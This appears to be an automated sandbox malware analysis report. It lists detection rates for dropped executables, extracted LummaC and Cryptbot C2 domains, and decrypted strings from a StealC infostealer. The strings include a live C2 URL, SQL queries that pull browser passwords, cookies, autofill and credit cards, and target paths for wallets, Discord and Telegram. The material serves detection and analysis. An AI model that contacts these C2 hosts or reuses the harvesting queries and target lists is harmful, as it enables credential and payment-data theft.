                          Source: RDX123456.exe.5292.48.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["computeryrati.site", "faulteyotk.site", "contemteny.site", "authorisev.site", "servicedny.site", "goalyfeastz.site", "opposezmny.site", "seallysl.site", "dilemmadu.site"], "Build id": "4SD0y4--RLREBORN"}
                          Source: Offnewhere.exe.7260.18.memstrminMalware Configuration Extractor: Cryptbot {"C2 list": ["sevjoi17sr.top", "home.sevjoi17sr.top", "0/80/home.sevjoi17sr.top"]}
                          Source: http://185.215.113.17/2fb6c2cc8dce150a.phproVirustotal: Detection: 18%Perma Link
                          Source: C:\ProgramData\LgAmARwZ\Application.exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exeReversingLabs: Detection: 79%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exeReversingLabs: Detection: 75%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exeReversingLabs: Detection: 31%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exeReversingLabs: Detection: 52%
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeReversingLabs: Detection: 76%
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeReversingLabs: Detection: 31%
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeReversingLabs: Detection: 79%
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exeReversingLabs: Detection: 75%
                          Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exeReversingLabs: Detection: 52%
                          Source: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeReversingLabs: Detection: 50%
                          Source: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exeReversingLabs: Detection: 36%
                          Source: file.exeReversingLabs: Detection: 50%
                          Source: file.exeVirustotal: Detection: 47%Perma Link
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exeJoe Sandbox ML: detected
                          Source: C:\ProgramData\LgAmARwZ\Application.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exeJoe Sandbox ML: detected
                          Source: file.exeJoe Sandbox ML: detected
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: INSERT_KEY_HERE
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 01
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 03
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 20
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 25
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetProcAddress
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: LoadLibraryA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: lstrcatA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: OpenEventA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CreateEventA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CloseHandle
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Sleep
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetUserDefaultLangID
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: VirtualAllocExNuma
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: VirtualFree
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetSystemInfo
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: VirtualAlloc
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: HeapAlloc
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetComputerNameA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: lstrcpyA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetProcessHeap
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetCurrentProcess
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: lstrlenA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ExitProcess
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GlobalMemoryStatusEx
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetSystemTime
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SystemTimeToFileTime
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: advapi32.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: gdi32.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: user32.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: crypt32.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ntdll.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetUserNameA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CreateDCA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetDeviceCaps
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ReleaseDC
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CryptStringToBinaryA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sscanf
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: VMwareVMware
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: HAL9TH
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: JohnDoe
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: DISPLAY
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %hu/%hu/%hu
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: http://185.215.113.17
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: 00x00
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: !|
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: /2fb6c2cc8dce150a.php
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: /f1ddeb6592c03206/
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: default_valenciga
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetEnvironmentVariableA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetFileAttributesA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GlobalLock
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: HeapFree
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetFileSize
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GlobalSize
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CreateToolhelp32Snapshot
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: IsWow64Process
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Process32Next
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetLocalTime
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: FreeLibrary
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetTimeZoneInformation
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetSystemPowerStatus
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetVolumeInformationA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetWindowsDirectoryA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Process32First
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetLocaleInfoA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetUserDefaultLocaleName
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetModuleFileNameA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: DeleteFileA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: FindNextFileA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: LocalFree
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: FindClose
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SetEnvironmentVariableA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: LocalAlloc
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetFileSizeEx
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ReadFile
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SetFilePointer
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: WriteFile
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CreateFileA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: FindFirstFileA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CopyFileA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: VirtualProtect
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetLastError
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: lstrcpynA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: MultiByteToWideChar
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GlobalFree
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: WideCharToMultiByte
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GlobalAlloc
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: OpenProcess
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: TerminateProcess
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetCurrentProcessId
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: gdiplus.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ole32.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: bcrypt.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: wininet.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: shlwapi.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: shell32.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: psapi.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: rstrtmgr.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CreateCompatibleBitmap
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SelectObject
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: BitBlt
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: DeleteObject
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CreateCompatibleDC
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GdipGetImageEncodersSize
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GdipGetImageEncoders
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GdiplusStartup
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GdiplusShutdown
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GdipSaveImageToStream
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GdipDisposeImage
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GdipFree
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetHGlobalFromStream
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CreateStreamOnHGlobal
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CoUninitialize
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CoInitialize
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CoCreateInstance
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: BCryptDecrypt
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: BCryptSetProperty
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: BCryptDestroyKey
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetWindowRect
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetDesktopWindow
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetDC
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CloseWindow
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: wsprintfA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: EnumDisplayDevicesA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetKeyboardLayoutList
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CharToOemW
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: wsprintfW
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RegQueryValueExA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RegEnumKeyExA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RegOpenKeyExA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RegCloseKey
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RegEnumValueA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CryptBinaryToStringA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CryptUnprotectData
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SHGetFolderPathA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ShellExecuteExA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: InternetOpenUrlA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: InternetConnectA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: InternetCloseHandle
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: InternetOpenA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: HttpSendRequestA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: HttpOpenRequestA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: InternetReadFile
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: InternetCrackUrlA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: StrCmpCA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: StrStrA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: StrCmpCW
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: PathMatchSpecA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: GetModuleFileNameExA
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RmStartSession
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RmRegisterResources
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RmGetList
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: RmEndSession
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3_open
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3_prepare_v2
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3_step
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3_column_text
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3_finalize
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3_close
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3_column_bytes
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: sqlite3_column_blob
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: encrypted_key
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: PATH
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: NSS_Init
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: NSS_Shutdown
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: PK11_GetInternalKeySlot
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: PK11_FreeSlot
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: PK11_Authenticate
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: PK11SDR_Decrypt
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: C:\ProgramData\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: browser:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: profile:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: url:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: login:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: password:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Opera
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: OperaGX
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Network
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: cookies
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: .txt
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: TRUE
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: FALSE
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: autofill
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SELECT name, value FROM autofill
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: history
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: cc
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: name:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: month:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: year:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: card:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Cookies
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Login Data
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Web Data
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: History
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: logins.json
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: formSubmitURL
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: usernameField
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: encryptedUsername
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: encryptedPassword
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: guid
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: cookies.sqlite
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: formhistory.sqlite
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: places.sqlite
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: plugins
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Local Extension Settings
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Sync Extension Settings
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: IndexedDB
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Opera Stable
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Opera GX Stable
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: CURRENT
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: chrome-extension_
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: _0.indexeddb.leveldb
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Local State
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: profiles.ini
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: chrome
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: opera
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: firefox
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: wallets
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %08lX%04lX%lu
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ProductName
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: x32
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: x64
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: ProcessorNameString
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: DisplayName
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: DisplayVersion
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Network Info:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - IP: IP?
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Country: ISO?
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: System Summary:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - HWID:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - OS:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Architecture:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - UserName:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Computer Name:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Local Time:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - UTC:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Language:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Keyboards:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Laptop:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Running Path:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - CPU:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Threads:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Cores:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - RAM:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - Display Resolution:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: - GPU:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: User Agents:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Installed Apps:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: All Users:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Current User:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: Process List:
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: system_info.txt
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: freebl3.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: mozglue.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: msvcp140.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: nss3.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: softokn3.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: vcruntime140.dll
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \Temp\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: .exe
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: runas
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: open
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: /c start
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %DESKTOP%
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %APPDATA%
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %LOCALAPPDATA%
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %USERPROFILE%
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %DOCUMENTS%
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %PROGRAMFILES%
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %PROGRAMFILES_86%
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: %RECENT%
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: *.lnk
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: files
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \discord\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \Local Storage\leveldb
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: \Telegram Desktop\
                          Source: 17.2.stealc_default2.exe.770000.0.unpackString decryptor: key_datas
